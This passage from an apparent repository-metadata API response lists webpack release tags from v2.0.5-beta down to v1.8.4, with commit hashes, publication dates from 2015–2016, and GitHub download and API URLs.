0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"pur